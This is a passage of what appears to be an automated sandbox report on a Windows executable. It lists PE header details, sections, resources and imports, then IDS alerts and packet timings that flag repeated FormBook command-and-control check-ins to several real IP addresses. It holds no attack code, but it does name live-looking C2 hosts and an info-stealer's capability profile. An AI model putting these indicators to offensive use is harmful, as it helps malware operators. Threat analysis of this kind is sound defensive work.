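        file_chars=0x0002 | 0x0020 | 0x0100,   # EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        dll_chars=0x0040 | 0x8000,             # DYNAMIC_BASE, TERMINAL_SERVER_AWARE
    )
    return parse_pe32_header(img)


if __name__ == "__main__":
    for key, value in reported_header().items():
        print(f"{key:22s} {value}")
```

Two things the decoded output makes explicit: the timestamp 0x668F14E2 is the Wed Jul 10 23:10:26 2024 UTC the report prints, one day before the analysis started, and the DLL characteristics listed above carry DYNAMIC_BASE but not NX_COMPAT, so the image opts into ASLR without opting into DEP.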
                                    Instruction
                                    call 00007F9474DDC6DDh
                                    jmp 00007F9474DCF494h
                                    int3
                                    Programming Language:
                                    • [ASM] VS2013 build 21005
                                    • [ C ] VS2013 build 21005
                                    • [C++] VS2013 build 21005
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2013 UPD5 build 40629
                                    • [RES] VS2013 build 21005
                                    • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x5bf14 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x5bf14 | 0x5c000 | ad2232649d454bf5658fecbc333f594b | False | 0.9304597274116848 | data | 7.901873262269623 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc84a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc85c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc88b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc89d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccc38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcdce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xce148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xce6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xced68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcf7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcfe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd02b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd0410 | 0x535aa | data | | | 1.0003251146688223
RT_GROUP_ICON | 0x1239bc | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123a34 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x123a48 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x123b24 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/11/24-15:07:47.687248 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.6 | 162.254.38.56
07/11/24-15:06:19.325666 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.6 | 188.114.97.3
07/11/24-15:06:09.188758 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49725 | 80 | 192.168.2.6 | 103.42.108.46
07/11/24-15:06:46.273374 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.6 | 35.212.86.52
07/11/24-15:06:03.503858 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49722 | 80 | 192.168.2.6 | 103.42.108.46
07/11/24-15:06:35.210818 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.6 | 134.122.138.60
07/11/24-15:07:22.659611 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49748 | 80 | 192.168.2.6 | 188.114.97.3
07/11/24-15:07:33.501313 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.6 | 154.222.238.52
07/11/24-15:07:02.361687 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.6 | 188.114.96.3
07/11/24-15:06:48.845266 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.6 | 35.212.86.52
07/11/24-15:06:32.631655 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.6 | 134.122.138.60
07/11/24-15:06:40.341512 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49735 | 80 | 192.168.2.6 | 134.122.138.60
07/11/24-15:07:17.488664 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.6 | 188.114.97.3
07/11/24-15:06:00.490458 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.6 | 103.42.108.46
07/11/24-15:07:38.871550 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49752 | 80 | 192.168.2.6 | 154.222.238.52
07/11/24-15:05:38.936362 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49718 | 80 | 192.168.2.6 | 142.250.186.115
07/11/24-15:07:30.927773 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49749 | 80 | 192.168.2.6 | 154.222.238.52
07/11/24-15:06:59.761285 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.6 | 188.114.96.3
07/11/24-15:06:24.480321 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49730 | 80 | 192.168.2.6 | 188.114.97.3
07/11/24-15:07:14.913315 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.6 | 188.114.97.3
07/11/24-15:06:16.735802 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.6 | 188.114.97.3
07/11/24-15:07:45.121444 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49753 | 80 | 192.168.2.6 | 162.254.38.56
07/11/24-15:06:53.999548 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49739 | 80 | 192.168.2.6 | 35.212.86.52
07/11/24-15:07:52.855523 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49756 | 80 | 192.168.2.6 | 162.254.38.56
07/11/24-15:07:07.976080 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.6 | 188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jul 11, 2024 15:06:10.687232971 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.687251091 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.687268019 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.687279940 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.687311888 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.687671900 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.687690020 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.687735081 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.687774897 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.688477039 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.688507080 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.688524008 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.688524961 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.688561916 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.689990997 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.690009117 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.690026045 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.690056086 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.690249920 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.690278053 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.690294027 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.690299988 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.690332890 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.691368103 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.691450119 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.691467047 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.691495895 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.693780899 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.693831921 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.693881989 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.696635962 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.696708918 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.696726084 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.696729898 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.696780920 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.697251081 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.697460890 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.697478056 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.697494030 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.697506905 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.697540045 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.698122978 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.698231936 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.698278904 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.698674917 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.698919058 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.698965073 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721170902 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721199989 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721218109 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721256018 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721287012 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721384048 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721470118 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721502066 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721524000 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721524000 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721573114 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721587896 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721611977 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721811056 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721860886 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721862078 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721888065 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721904993 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721920967 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721932888 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.721937895 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.721966982 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.722661018 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722677946 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722693920 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722721100 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.722722054 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722738981 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722745895 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.722755909 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722773075 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.722800016 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.722836018 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.723525047 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723541021 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723556995 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723593950 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723598003 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.723611116 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723628998 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723640919 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.723645926 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.723670959 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.724621058 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724637985 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724653959 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724679947 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.724700928 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724704981 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.724718094 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724735022 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724751949 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.724765062 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.724793911 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:10.725992918 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.726007938 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.726023912 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.726038933 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:10.726054907 CEST8049725103.42.108.46192.168.2.6
